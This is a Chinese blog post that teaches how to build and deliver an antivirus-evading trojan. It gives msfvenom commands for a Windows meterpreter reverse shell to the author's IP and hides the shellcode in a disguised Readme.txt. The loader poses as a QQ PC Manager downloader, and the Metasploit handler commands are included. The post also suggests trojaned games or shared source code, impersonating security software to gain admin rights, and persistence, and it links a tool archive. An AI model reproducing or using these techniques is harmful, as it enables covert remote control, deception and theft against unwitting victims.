我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前全部软件都没法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向个人PE-tools工具里写了一个功能,就是shellcode注入功能,写好以后,发现虽然shellcode能注入,可是不能免杀,因而采用各类加密技巧,仍是没能逃脱火绒,我绞尽脑汁的想,使用dll注入,dll注入虽然能逃脱免杀,payload反弹时,但是不能交互了.我就采用一种更笨的方法,就是程序运行时加载一下shellcode文件,试了一下成功免杀.好废话很少说,我们开始!!!!shell
Kali (攻击机) Win10 (受害机 且安装有各类杀毒软件) WinXp (辅助机,只是用来编译源码的)
免杀效果其实很简单,就是程序启动后加载文件动态运行里面写好的shellcode便可. 并且还方便替换shellcode不用编译,直接替换文本文件内容便可,且还能够假装为Readme.txt文件 能够向Readme.txt乱填入一些声明,将shellcode进行排版,以防被发现.. 能够借助一些软件进行编译你的加载器,修改图标即大小,让对方毫无怀疑...
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c lhost后面就是我本地的ip, lport后面时指定的一个端口号.指定好以后,会生成shellcode以下图:
将生成的shellcode复制粘贴到一个文件里,你也能够直接使用 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt 那shellcode放在了a.txt文件中了,代开看也更上图如出一辙.
获得shellcode以后,我先进行操做,涉及到加载器的源码,我会把它放在末尾来讲: 使用我已经编译后的一个仿真电脑管家下载器,如图:
一个文件是模拟电脑管家下载器的一个软件,是我编译好的一个文件,后面我会讲它的简单原理与制做 另外一个 Readme.txt就是咱们放置shellcode的文件 我向Readme.txt里写入了一些东西,可让下载的人这东西只是用来声明的,如图
使劲回车,而后将本身的shellcode复制到该文件.
这里我把shellcode藏在了该文件的底部,通常人它也只读前面,后面不会看,看到了也不知道那是啥玩意.. 复制好以后,千方百计将这两个文件仍到你的目标,有不少方法,就很少说了..
假如对方已经拿到了,该软件,如图:
从这里能够知道,静态的反杀已经OK,昨天使用的各类加密手段,仍是没能逃脱火绒的魔抓,这个方法还能够,看一下Readme.txt
往下拉看一下shellcode:
若是以为shellcode太显眼,你能够对它进行base64加解密就行. 在kali中输入 msfconsole 进入以后如图:
依次输入如下命令 #msf5> use exploit/multi/handler #msf5> set payload windows/meterpreter/reverse_tcp #msf5> set lhost ip (这里填你的攻击机上的ip) #msf5> set lport port (这里填生成shellcode时的端口) #msf5> exploit -j (后台监听) 如图:
当对方点击QQPCDownload运行时便可获得shell.
看到了一个session 开启了输入 session -i 1 (1就是开启号) 进行交互.输入sysinfo
我们使用火绒来边扫描边控制吧...
能够看到,彻底杀不到.....好了演示结束,接下来就是讲讲加载器咋写吧.
根据网络安全法律,不公布
可使用,extraicohs工具提取任意一个exe文件的图标,提取以后,在vc6中添加图标进行编译 而后再使用我开发的一个工具调整一下加载器的大小.
我作了几个游戏,游戏里就包含了木马,然对方直接不知道这个有病毒.还有一种方式更加假装. 分享啥啥源码,好比我作的一个贪吃蛇游戏,若对方获得源码,只要对方编译运行,便可中招.. 为了安全着想,我不分享我作的木马....,但原理我已经说了,十分简单.. 能够提取如图:windows
使用Pe_tools增长大小, 如图:
写入到c盘,若为win10电脑,写入到其余磁盘.
买一个服务器,选择debian,而后安装metasploit框架,既能够实现控制任意一台中木马的电脑....
侵入对方后,看一下他的安全软件,而后使用木马冒充安全软件,在开发木马时,设置一下运行的权限为管理员便可 而后运行该木马,这时就会出现一个管理员权限的请求,通常状况下,用户都很信任安全软件获取管理员权限,则点击是. 而后c盘随你玩了
要想实现长期控制,就得给对方上传开机自的木马...,我已经作好了,且根据对方的杀毒软件作的一个白加黑. 杀毒软件和使用者毫无察觉,为了避免让本身进局子,我不会发给别人..
实验工具下载: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip